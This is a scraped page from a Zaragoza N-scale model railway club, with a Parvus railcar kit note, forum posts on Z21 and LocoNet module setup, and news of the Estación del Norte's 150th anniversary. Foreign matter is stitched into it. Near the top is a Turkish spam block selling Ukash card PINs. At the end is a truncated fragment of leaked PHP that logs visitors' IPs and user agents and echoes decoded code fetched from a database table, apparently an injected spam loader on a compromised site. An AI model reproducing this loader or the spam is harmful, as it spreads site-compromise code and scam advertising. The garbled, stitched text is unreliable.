AGENZ

  • Aumentar fuente
  • Fuente predeterminada
  • Disminuir fuente

ukash

Ukash Satın Almak İçin Doğru adrestesiniz. En ucuz en güncel ukash kart satışı bu adreste. Her zaman kaliteli pin numarası almak için mutlaka bize ulaşın. Ukash 19 haneli bir kartdır. Bu kart ile bir çok siteden alış veriş yapabilmektesiniz. -

Parvus, Burmeinster & Wain MTM

E-mail Imprimir

Automotor de época II/III que circulo por España en los años 30 en numerosos servicios y del que Parvus ha comercialzado varias versiones incluyendo·la del articulo que fue utilizado como Tren Sanitario por el Ejercito de la Republica.
Attachments:
FileFile size
Download this file (Parvus_Burmeinster&Wain.pdf)Parvus_Burmeinster&Wain.pdf484 Kb
 
 

Calendario

Octubre 2018
L M X J V S D
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31 1 2 3 4

Últimos eventos

Sin eventos

Banner
Banner
Banner
Banner
Banner
Banner
Banner

Visor de noticias

FORO AGENZ
AGENZ (Agrupación escala N Zaragoza)
  • Los bucles de Retorno en Digital • RESETEAR GESTOR DE BUCLE LENZ LK200
    Tenía ese gestor de bucle conectado y funcionando y, de repente, sin saber porqué se ha quedado atascada una orden de marcha (digital con Z21) en la vía intervenida por el gestor como de salida.
    ¿Puede ayudarme alguien a resetearlo, porque cuando una locomotora entra en esa vía corta toda la maqueta y, si la rearmo, la locomotora sale disparada en el sentido en el que entró?
    Muchas gracias

    Estadísticas: Publicado por Javi — Jue Oct 18, 2018 9:13 pm


  • Encuentros T-Trak • Re: Trobada de mòduls T-Trak en Lleida 29- Setiembre 2018
    Aquí os dejo un enlace a fotografías del evento.

    http://www.t-trak-nordeste.es/rufea2018.htm


    Saludos

    Estadísticas: Publicado por ToniLleida — Lun Oct 01, 2018 3:25 pm


  • Todo Digital • Re: ¿Como programar DR4088LN con Z21?
    Hola amigos,
    Ha pasado tiempo, pero hace unos días, conseguí a través de consultas en foros y demás, solucionar la papeleta de programar los retromódulos DR4088-LN a través de Loconet con la Z21, por ello, y para quien le pueda ser útil, lo explico:

    1.- En el Control Station de la App Z21, debemos crear los siguientes elementos:
    Un objeto cualquiera, como un desvío, al que le daremos la dirección del primer retrocontacto, p.ej: 01
    Un objeto cualquiera, como otro desvío, al que le daremos la dirección del último retrocontacto que tengamos, p.ej: (Con 4 módulos de 16), será el nº 48

    2.- Una vez los tengamos creados, pasaremos a la pantalla de juego o manejo de trenes, y visualizamos la página de los accesorios, con ella delante, pulsaremos el botón de programación del módulo principal DR4088-LN, el led verde parpadeará más rápido. Pulsaremos primeramente, el accesorio macado con la dirección, 01 en nuestro ejemplo, y seguidamente, pulsaremos el accesorio marcado con la última dirección, 48 en nuestro caso. Una vez lo hayamos hecho, el led verde volverá a parpadear más lentamente, indicándonos que los retrocontactos de los módulos ya están configurados y numerados.

    3.- Volviendo a la pantalla del Control Station, crearemos tantos elementos "response module" como módulos de los que queramos visualizar el estado de ocupación. Seleccionaremos cada uno de ellos y los editaremos de la siguiente forma:
    Elegiremos el tipo "Uhlenbrock 63320", y en Settings escribiremos el número correspondiente, del 01 al 48.

    Al volver a la pantalla general, el módulo habrá sido creado y lo podremos mover y colocar en nuestro esquema de la maqueta. Así con el resto de módulos hasta el último que hayamos creado.
    Estos módulos, en la pantalla de accesorios del modo Play, se iluminarán en rojo siempre que los retrocontactos correspondientes estén ocupados, y en color gris cuando queden liberados.

    Esperando que haya sido claro, y que le pueda ser útil a algún compañero,

    Un cordial saludo

    Estadísticas: Publicado por AFIZION600RR — Dom Sep 23, 2018 6:11 pm



Noticias - Flash

Fuente de

http://www.redaragon.com/cronicas/margenizquierda/noticia.asp?pkid=692515

(Fotografía de FORO AGENZ)

La Estación del Norte está de aniversario

El 26 de septiembre se cumplen 150 años de la llegada del ferrocarril

 

La Estación del Norte cumple 150 años.

 

El 26 de septiembre se conmemora el 150 aniversario de la llegada del ferrocarril a Zaragoza y de la inauguración de la Estación del Norte. Con tal motivo desde la Asociación de Vecinos Tío Jorge Arrabal, con el patrocinio de SAICA, han preparado una serie de actos para poder celebrar dicha efeméride, explica su presidente, Rafael Tejedor.

Los actos comenzarán el domingo 25 de septiembre con un encuentro de maquetistas escala N. El lunes 26, será el día principal de los actos al coincidir con la fecha exacta del aniversario. Para la ocasión se inaugurará a las 17.30 horas la exposición del 150 aniversario de la Estación del Norte compuesta por más de 70 fotografías antiguas de la Estación del Norte, que son un ejemplo de participación ciudadana por proceder de aportaciones de vecinos para este aniversario, por lo que la mayoría de ellas serán inéditas para el público. Junto a las fotografías habrá una maqueta recreando la antigua Estación del Arrabal y un DVD conmemorativo que se emitirá ininterrumpidamente.

Tras la inauguración de la exposición se pasará al acto central consistente en una conferencia sobre los 150 años del ferrocarril en Zaragoza y la Estación del Norte a cargo de Borja Jiménez, así como un homenaje a los vecinos que trabajaron en la Estación del Norte. La jornada concluirá con un concierto de Grog.

Los días 27, 28 y 29 de septiembre continuarán los actos conmemorativos con un ciclo de cine ferroviario. El martes 27 será el día de la exhibición de películas relacionadas con el ferrocarril de directores aragoneses con la proyección de ´Santa Olaja de acero´ y ´Hacia el silencio´, ambas de José Antonio Páramo, la última de ellas grabada en la Estación del Norte. También se proyectará ´Culpable para un delito´ de Jose Antonio Duce, donde también aparecen imágenes grabadas en la Estación del Norte.

El miércoles 28 se podrá ver el clásico ´El maquinista de la general´, de Buster Keaton, película de cine mudo que se proyectará con pianista en directo, como se hacia a principios del siglo XX.

El ciclo se cerrará el jueves 29 con ´Doctor Zhivago´, película grabada íntegramente en España con amplia presencia ferroviaria.

Los actos se cerrarán el 30 de septiembre con la conferencia de clausura sobre ´La importancia del ferrocarril en el desarrollo industrial del barrio del Arrabal y de Zaragoza´, a cargo de los profesores de la Universidad de Zaragoza Pilar Biel, especialista en Arqueología Industrial y Eduardo Lezaun, catedrático de Ingeniería especialista en ferrocarril.

La exposición conmemorativa estará abierta al público del 26 de septiembre hasta el 16 de octubre. Todos los actos del programa se desarrollarán en el Centro Cívico Estación del Norte.

= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>